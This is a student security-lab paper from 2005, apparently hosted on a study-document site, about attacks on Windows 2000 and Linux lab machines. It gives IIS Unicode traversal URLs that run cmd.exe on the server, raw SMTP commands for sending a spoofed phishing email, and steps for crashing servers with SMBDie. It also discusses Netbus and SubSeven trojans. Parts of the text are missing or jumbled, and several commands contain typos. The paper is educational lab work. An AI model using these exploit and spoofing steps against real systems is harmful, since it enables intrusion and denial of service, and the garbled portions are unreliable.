




Study with the several resources on Docsity
Earn points by helping other students or get them with a premium plan
Prepare for your exams
Study with the several resources on Docsity
Earn points to download
Earn points by helping other students or get them with a premium plan
Material Type: Paper; Professor: Lilien; Class: Embedded Systems; Subject: Computer Science; University: Western Michigan University; Term: Fall 2005;
Typology: Papers
1 / 8
This page cannot be seen from the preview
Don't miss anything!





Abstract —In today’s world, almost all computers are interconnected to one another. Though this is highly appreciable, it also becomes a necessity to safeguard the computer from outside attacks. The attacks could leave a permanent or temporary damage to the computer. In either case a lot of time and money should be spent in fixing this problem. The study of various security flaws helps in understanding the possible vulnerabilities in a system and the ways by which it can be minimized. Index Terms —exploit, social engineering, Trojan, vulnerability I. INTRODUCTION Computers today are highly vulnerable and fall prey to attacks from another person or system. This paper presents an explanation on the various types of attacks and ways by which these attacks can be prevented. II. WEB SERVER EXPLOITS By default all Windows 2000 servers are pre-installed with Microsoft’s Internet Information Server (IIS). A number of vulnerabilities have been discovered since the release of IIS 5.0 and exploits were achieved through these vulnerabilities. A publicly available server must be maintained to retain its confidentiality, integrity and availability. Here we will exploit the vulnerability explained in Common Vulnerabilities and Exposures, CVE-2001- 0333[19]. The vulnerability explains the execution of arbitrary commands by remote attackers by encoding “..” and “\” characters twice. Manuscript received December, 2005. This work was supported by the Department of Computer Science, Western Michigan University. Amit T Arakeswara is doing his graduate studies in Computer Science at Western Michigan University, Kalamazoo, MI-49008. (email:[email protected]) Rathna Kaliannan is doing his graduate studies in Electrical Engineering at Western Michigan University, Kalamazoo, MI-49008. (email:[email protected]) Vrishal Dinar is doing his graduate studies in Computer science at Western Michigan University, Kalamazoo, MI-49008.(email:[email protected]) A. Setup A Windows 2000 Server is exploited with the help of a Windows XP machine. The address of the server is typed on the internet explorer bar of the XP machine. Let’s say http://192.168.100.102/ is the address of the server. The page returns the default page of the server [20]. B. The exploit Exploit of the web server is done by typing, http://192.168.100.102/scrips/..%255c../winnt/system32/cmd. exe?/c+dir. In the above hyperlink, scripts are the directory from which commands will be run. The ..%255c.. is Unicode that is ignored by the web server but used to traverse out of the Web root. The /winnt/system32/cmd.exe? is the command being called and /c+dir is the option to go with the command. Now, the winnt directory could be viewed by adding \winnt to the address, http://192.168.100.102/scripts/..%244c../winnt/system32/cmd .exe?/c+dir+\winnt. A directory is created in the server by including the following commands c+mkdir+\exploit in the address bar, http://192.168.100.102/scrips/..%255c../winnt/system32/cmd. exe?/c+dir+. This will return an error since the command mkdir does not return anything. When the Refresh button is hit, it returns an error but also displays that the directory exists. Now a trojan or virus could be implemented onto the directory ‘exploit’. The cmd.exe is copied onto the directory ‘exploit’ by, http://192.168.100.102/scripts/..%255c../winnt/system32/cmd .exe?/c+copy+\winnt\system32\cmd.exe+\exploit
The cmd.exe is copied onto the ‘exploit’ directory is used to perform an exploitation. This is done by issuing the address, http://192.168.100.102/scripts/..%255c../exploit/cmd.exe?/c+ dir+\exploit. C. Verification and results The exploit is verified by checking the directory ‘exploit’ on the Windows 2000 server and the presence of cmd.exe under it. III. EMAIL SYSTEM EXPLOITS One of the most widely used applications on the internet is e-mail. Though it is a very convenient way of communication, viruses could be easily delivered with this facility. The attacker spoofs his email-address and sends it as an authentic mail from a trusted company. The user would obviously be tricked into reading this mail. If he was not aware about spoofing and phishing, he might end up downloading an executable from the email. This executable could be a trojan or a virus. This way of tricking someone into doing something they would normally not do is called social engineering. A. Exploit on a Linux client - Evolution Evolution is configured on linux client. The server is named as linuxserv.security.local. Let a user profile be created with the name ‘labuser’. On the linux client let us open Telnet by typing ‘telnet’. The ‘open’ command is issued by entering, open 192.168.100.202 25. 192.168.100.202 is the address of the server and 25 is the SMTP mail server protocol. Now a mail could be sent by issuing the following commands. mail from: [email protected]. rcpt to: [email protected] data Write the following on the program From:[email protected]. To: [email protected] Subject: Important update MIME-Version” 1. Content-type:text/html; charset=us-ascii
Important update
hI here!
Enter a “.” to complete the message. The line here! points to a reference. The reference ‘here!’ could call a file on the server that may be compromised in terms of security. This link could also be programmed to send an increment to a counter which would determine if the object has been opened by a user or not. The logs stored on the server can be accessed by typing, cat /var/log/httpd/access_log. Now when evolution is opened, the ‘labuser’ would find a mail in his or her inbox sent from [email protected]. Evolution can now be configured by specifying the host name to be linuxserv.security.local and the username is [email protected]. When we click on the check for mail button, the mail will be delivered and the person is more likely to be cheated into clicking the link. B. Exploit on Windows - Outlook Here a windows 2000 server is used with XP pro and linux server. The outlook express is configured for ‘labuser’ by choosing POP3 protocol. The incoming and outgoing mailbox is set to linuxserv.security.local. A mail with the following code is sent by initiating a telnet session as explained earlier. From: [email protected] To: [email protected] Subject: Important Update MIME-Version: 1. Content-type: text/html; charset=us-ascii
Important Updates</titles></head> <body bgcolor="#FF0000">> <h1>Important Updates</h1> You need the Important Update
This will result in packets being sent to the victim apparently from different hosts. C. Ping Ping stands for “Packet Internet Groper”. A utility that forwards data packets to check the quality of a link or verify the connection of a machine to the Internet. It provides a basic test of whether a particular host is operating properly and is reachable on the network from the testing host. Ping provides estimates of the round-trip time and packet loss rate between hosts. It works by sending ICMP “echo request” packets to the target host and listening for replies (ICMP “echo response” packets). Steps for execution In the command prompt type the following: ping This will result in giving the packet information, the round trip time etc., if the host exists in the network else this will result in operation timed out. D. SMBDie SMBDie is a tool which was created to exploit a problem with the Windows operating system and when activated, will crash and Blue Screen the server immediately SMB ( Server Message Block ) is the protocol Microsoft uses to share files, printers, serial ports, and also to communicate between computers using named pipes and mail slots. Clients make SMB requests for resources and servers make SMB responses in what described as a client server, request- response protocol. An administrator can block access to SMB on TCP ports 445 and 139 at the network perimeter. This would block access from un-trusted networks. However, legitimate users could be blocked in a ‘file and print’ networking environment. Administrators could also shut down the lanman server service. But this action would block legitimate users from using file and print services on a particular server where the lanman service had been stopped. The remedy for this is to download the patches from the following Microsoft sites based on the operating system/server installed. For Microsoft Windows 2000 it is , http://www.microsoft.com/downloads/Release.asp? ReleaseID= For Microsoft Windows XP it is, http://www.microsoft.com/downloads/Release.asp? ReleaseID= Steps for execution Down load the SMBDie tool from http://www.windowssecurity.com Extract the entire file in a folder and double click on the executable. This will prompt for the ipaddress and the NETBios name of the server to be crashed. The NETBios name can be known by executing the command nbtstat –n in the command prompt Press “ Kill ” button, you will observe that the server has crashed and blue screened immediately. E. Ethereal Ethereal is a network protocol analyzer, otherwise known as a "packet sniffer", which is a tool that captures and decodes packets of information from a network. Ethereal can capture live network traffic or read data from a file and translate the data to be presented in a format the user can understand. Network analyzers such as Ethereal are invaluable tools for administrators to diagnose and troubleshoot problems with, but are also used by intruders to obtain unauthorized information. Ethereal can be used to capture and analyze network packets and discover a wide array of information such as: Troubleshooting network issues and locating bottlenecks Network intrusion detection
Log network traffic for forensic analysis Discovering a DoS (denial-of-service) attack Steps for execution Download Ethereal from http://www.ethereal.com Run the executable List all the available capture interfaces by clicking the first option from the toolbar. Select the interface to be captured and sniff through all the packets in that interface. V TROJAN ATTACKS A computer virus is a self-replicating program that spreads by inserting copies of itself into other executable code or documents [1]. It behaves in a way similar to a biological virus, which spreads by inserting itself into living cells. A Trojan horse is a similar kind of program, the only difference being that it is disguised as legitimate software. It is so named after the legendary ‘Trojan horse’ left on the shores of Troy by the Greeks to lull the Trojans into a false sense of belief that the war was over. We will be talking about two Trojan horse programs, hitherto referred to as ‘trojan(s)’
The vulnerability of Windows 2000 web server is studied and tested. It therefore becomes necessary to apply the latest security updates and patches as soon as any operating system with IIS is installed. The denial of service attacks warns the users without firewalls. The SubSeven and Netbus trojans shows how vulnerable a system could be in a networked environment. This along with email spoofing warns users to constantly scan their systems using updated anti-virus software. ACKNOWLEDGMENT We would like to thank our teacher, Dr. Leszek Lilien for his continued support all throughout this semester, and for helping us out of any speed bumps we might have faced. We would also like to thank the lab administrators in room C- for letting us continue our work in spite of all the noise and the odd timings of our operation. REFERENCES [1] http://en.wikipedia.org/wiki/Computer_virus [2] http://www.hackfix.org/netbusfix/ [3] http://www.windowsecurity.com/articles/ The_Netbus_trojan.html [4] http://www.cultdeadcow.com [5] http://www.hackfix.org/SubSeven/
[6] http://www.tcp-ip-info.de/trojaner_und_viren/ netbus_pro_eng.htm [7] http://www.hackpr.net/~sub7/ [8] http://www.hackpr.net/~sub7/faq.shtml [9] http://www.come.to/soul4blade [10] http://www.ethereal.com [11] http://www.fsf.org/ [12] http://www.gnu.org [13] http://www.gnu.org/philosophy/free-sw.html [14] http://www.windowssecurity.com.articles/ SMBDie_Crashinf_Windows_Servers_with_Ease.html [15] http://www.ss64.com/nt/nbtstat.html [16] http://insecure.org/nmap/ [17] http://www.securityfocus.com/infocus/ [18] http://www.ethereal.com/distribution/win32/ [19] http://www.cve.mitre.org/ [20] Vincent J Nestler, Wm. Arthur Conklin, Gregory B. White, Matthew P. Hirsch, “Computer Security Lab Manual”, MCGraw Hill, 2005 [21] Pfleeger and Pfleeger, Security in Computing. Third Edition , Prentice Hall PTR, 2003